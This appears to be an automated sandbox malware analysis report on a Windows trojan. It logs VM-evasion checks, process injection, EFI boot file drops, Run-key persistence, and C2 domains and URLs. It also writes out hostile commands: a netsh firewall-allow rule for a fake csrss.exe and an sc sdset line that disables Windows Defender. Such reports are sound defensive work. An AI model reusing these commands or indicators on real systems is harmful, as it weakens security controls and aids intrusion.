          Source: csrss.exe, 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
          Source: csrss.exe, 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
          Source: csrss.exe, 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
          Source: csrss.exe, 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
          Source: csrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\windefender.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\windefender.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmp Binary or memory string: VMUSRVC.EXE
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe TID: 2284Thread sleep time: -86000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 6376Thread sleep time: -150000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)Jump to dropped file
          Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
          Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
          Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Boot\bootx64.efiJump to dropped file
          Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
          Source: C:\Windows\rss\csrss.exeDropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
          Source: C:\Windows\rss\csrss.exeRegistry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile opened / queried: VBoxGuestJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile opened / queried: vmciJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile opened / queried: HGFSJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile opened / queried: VBoxTrayIPCJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile opened / queried: \pipe\VBoxTrayIPCJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeFile opened / queried: VBoxMiniRdrDNJump to behavior
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\rss\csrss.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe - Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe - Code function: 35_2_00007FF6148A5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,35_2_00007FF6148A5C10
          Source: jkDmft1Qoe.exe, 00000004.00000002.681321286.00000000118E2000.00000004.00000001.sdmp - Binary or memory string: xennetxensvcxenvdbsilentdustsilentdust.exe@
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmp - Binary or memory string: vmusrvc.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmp - Binary or memory string: qemuvirtual
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmp - Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmp - Binary or memory string: systemvboxtray.exe
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmp - Binary or memory string: main.isRunningInsideVMWare
          Source: jkDmft1Qoe.exe, 00000004.00000002.679881756.000000001180A000.00000004.00000001.sdmp - Binary or memory string: vmmousevmusb$
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmp - Binary or memory string: vmsrvc.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmp - Binary or memory string: vboxservice.exe
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmp - Binary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmp - Binary or memory string: vboxtray.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.679881756.000000001180A000.00000004.00000001.sdmp - Binary or memory string: dllhost.exesvchost.exejkdmft1qoe.exejkdmft1qoe.exevmci$
          Source: jkDmft1Qoe.exe, 00000004.00000002.679881756.000000001180A000.00000004.00000001.sdmp - Binary or memory string: vmhgfs$
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmp - Binary or memory string: [system process]vboxtray.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmp Binary or memory string: systemvmsrvc.exe
          Source: csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmp Binary or memory string: l}main.isRunningInsideVMWare
          Source: jkDmft1Qoe.exe, 00000004.00000002.681129275.00000000118B8000.00000004.00000001.sdmp Binary or memory string: sharedintapp.exe[system process]vmsrvc.exe
          Source: jkDmft1Qoe.exe, 00000004.00000002.679881756.000000001180A000.00000004.00000001.sdmp Binary or memory string: vmxnetvmx86
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 35_2_00007FF61488E1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00007FF61488E1D4
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 35_2_00007FF6148A9D3C GetProcessHeap,35_2_00007FF6148A9D3C
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Process token adjusted: Debug
          Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug
          Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug
          Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 35_2_00007FF61488D8BC SetUnhandledExceptionFilter,_invalid_parameter_noinfo,35_2_00007FF61488D8BC
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 35_2_00007FF61488DE24 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_00007FF61488DE24
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 35_2_00007FF61488E1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00007FF61488E1D4
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 35_2_00007FF61488E37C SetUnhandledExceptionFilter,35_2_00007FF61488E37C
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 35_2_00007FF61489543C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_00007FF61489543C

          HIPS / PFW / Operating System Protection Evasion:

          Contains functionality to inject threads in other processes
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 35_2_00007FF6148827F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,35_2_00007FF6148827F0
          Performs DNS TXT record lookups
          Source: Traffic DNS traffic detected: queries for: trumops.com
          Source: Traffic DNS traffic detected: queries for: logs.trumops.com
          Source: Traffic DNS traffic detected: queries for: 8db1a514-f568-41bf-af6a-dffb7cea0346.uuid.trumops.com
          Source: Traffic DNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe ''
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
          Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
          Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          Source: C:\Windows\windefender.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
          Source: csrss.exe, 0000000A.00000002.932879909.0000000032450000.00000002.00020000.sdmp Binary or memory string: Program Manager
          Source: csrss.exe, 0000000A.00000002.932879909.0000000032450000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: csrss.exe, 0000000A.00000002.932879909.0000000032450000.00000002.00020000.sdmp Binary or memory string: Progman
          Source: csrss.exe, 0000000A.00000002.932879909.0000000032450000.00000002.00020000.sdmp Binary or memory string: Progmanlock
          Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW,35_2_00007FF6148A96F0
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: try_get_function,GetLocaleInfoW,35_2_00007FF6148A0FD0
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,35_2_00007FF6148A8FF0
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW,35_2_00007FF6148A98F8
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,35_2_00007FF6148A9848
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,35_2_00007FF6148A9A24
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW,35_2_00007FF6148A0A8C
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW,35_2_00007FF6148A940C
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: EnumSystemLocalesW,35_2_00007FF6148A933C
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,35_2_00007FF6148A94A4
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 35_2_00007FF6148A5140 cpuid 35_2_00007FF6148A5140
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 35_2_00007FF61488E0C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,35_2_00007FF61488E0C8

          Lowering of HIPS / PFW / Operating System Security Settings:

          Uses netsh to modify the Windows network and firewall settings
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
          Modifies the Windows firewall
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

          Remote Access Functionality:

          barindex
          Yara detected Metasploit PayloadShow sources
          Source: Yara matchFile source: jkDmft1Qoe.exe, type: SAMPLE
          Source: Yara matchFile source: 25.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.jkDmft1Qoe.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 32.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 32.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.jkDmft1Qoe.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.0.jkDmft1Qoe.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.jkDmft1Qoe.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: C:\Windows\rss\csrss.exe, type: DROPPED

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Windows Management Instrumentation 21 | Windows Service 1 | Windows Service 1 | Disable or Modify Tools 2 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 13 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 112 | Obfuscated Files or Information 11 | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Credential API Hooking 1 | Exfiltration Over Bluetooth | Encrypted Channel 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Service Execution 1 | Registry Run Keys / Startup Folder 11 | Scheduled Task/Job 1 | Software Packing 11 | Security Account Manager | System Information Discovery 44 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 11 | Masquerading 33 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 25 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 3 | LSA Secrets | Security Software Discovery 251 | SSH | Keylogging | Data Transfer Size Limits | Proxy 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 112 | Cached Domain Credentials | Virtualization/Sandbox Evasion 3 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Process Discovery 13 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          [Figure: behavior graph. ID: 504422; Sample: jkDmft1Qoe; Start date: 18/10/2021; Architecture: WINDOWS; Score: 100]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          jkDmft1Qoe.exe | 58% | Virustotal |
          jkDmft1Qoe.exe | 34% | Metadefender |
          jkDmft1Qoe.exe | 47% | ReversingLabs | Win32.Hacktool.PowerSploit
          jkDmft1Qoe.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Windows\rss\csrss.exe | 100% | Joe Sandbox ML |
          B:\EFI\Boot\old.efi (copy) | 0% | ReversingLabs |
          B:\EFI\Microsoft\Boot\fw.efi (copy) | 0% | ReversingLabs |
          C:\EFI\Boot\EfiGuardDxe.efi | 0% | ReversingLabs |
          C:\EFI\Boot\bootx64.efi | 0% | ReversingLabs |
          C:\EFI\Microsoft\Boot\bootmgfw.efi | 0% | ReversingLabs |
          C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll | 46% | Metadefender |
          C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll | 59% | ReversingLabs | Win64.Trojan.Glupject
          C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | 14% | Metadefender |
          C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe | 73% | ReversingLabs | Win64.Trojan.Glupteba
          C:\Windows\rss\csrss.exe | 34% | Metadefender |
          C:\Windows\rss\csrss.exe | 47% | ReversingLabs | Win32.Hacktool.PowerSploit
          C:\Windows\windefender.exe | 41% | ReversingLabs | Win32.Trojan.WinGoRanumBot

          Unpacked PE Files

          Source | Detection | Scanner | Label
          10.3.csrss.exe.11920c00.9.unpack | 100% | Avira | TR/Patched.Ren.Gen
          50.0.windefender.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          46.2.windefender.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          46.0.windefender.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          10.2.csrss.exe.11c1c000.10.unpack | 100% | Avira | TR/Patched.Ren.Gen
          10.2.csrss.exe.11b9c000.9.unpack | 100% | Avira | TR/Patched.Ren.Gen
          50.2.windefender.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          gohnot.com | 6% | Virustotal |
          server1.trumops.com | 6% | Virustotal |

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          gohnot.com | 172.67.196.11 | true | true | | unknown
          server1.trumops.com | 172.67.139.144 | true | false | | unknown
          8db1a514-f568-41bf-af6a-dffb7cea0346.uuid.trumops.com | unknown | unknown | true | | unknown
          trumops.com | unknown | unknown | true | | unknown
          logs.trumops.com | unknown | unknown | true | | unknown
          e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com | unknown | unknown | true | | unknown

                  Contacted URLs

                  Name | Malicious | Antivirus Detection | Reputation
                  https://server1.trumops.com/api/poll | true | Avira URL Cloud: malware | unknown
                  https://server1.trumops.com/api/cdn?c=1a0ceff6e935c933&uuid=8db1a514-f568-41bf-af6a-dffb7cea0346 | true | Avira URL Cloud: malware | unknown
                  http://gohnot.com/370c4779d730135afa0e64399be9936c/watchdog.exe | true | Avira URL Cloud: malware | unknown
                  https://server1.trumops.com/bots/post-ia-data?uuid=8db1a514-f568-41bf-af6a-dffb7cea0346 | true | Avira URL Cloud: malware | unknown

                  URLs from Memory and Binaries


                            Contacted IPs

                            Public

                            IP | Domain | Country | ASN | ASN Name | Malicious
                            172.67.139.144 | server1.trumops.com | United States | 13335 | CLOUDFLARENETUS | false
                            104.21.79.9 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                            172.67.196.11 | gohnot.com | United States | 13335 | CLOUDFLARENETUS | true

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:504422
                            Start date:18.10.2021
                            Start time:08:00:24
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 12m 19s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:jkDmft1Qoe (renamed file extension from none to exe)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:52
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.rans.troj.evad.winEXE@48/13@12/3
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 98.7% (good quality ratio 81.5%)
                            • Quality average: 59.4%
                            • Quality standard deviation: 36.3%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            Warnings:
                            • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 20.82.210.154, 95.100.218.79, 104.94.89.6, 40.127.240.158, 20.54.110.249, 40.112.88.60, 40.91.112.76, 2.20.178.33, 2.20.178.24, 20.50.102.62
                            • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            Time | Type | Description
                            08:01:17 | API Interceptor | 10x Sleep call for process: jkDmft1Qoe.exe modified
                            08:01:25 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SilentDust "C:\Windows\rss\csrss.exe"
                            08:01:26 | API Interceptor | 17x Sleep call for process: csrss.exe modified
                            08:01:28 | Task Scheduler | Run new task: csrss path: C:\Windows\rss\csrss.exe
                            08:01:35 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SilentDust "C:\Windows\rss\csrss.exe"
                            08:02:16 | API Interceptor | 10x Sleep call for process: svchost.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN


                            JA3 Fingerprints

                            No context

                            Dropped Files


                                                                    Created / dropped Files

                                                                    B:\EFI\Boot\old.efi (copy)
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:MS-DOS executable
                                                                    Category:dropped
                                                                    Size (bytes):7680
                                                                    Entropy (8bit):4.486535052248291
                                                                    Encrypted:false
                                                                    SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                    MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                    SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                    SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
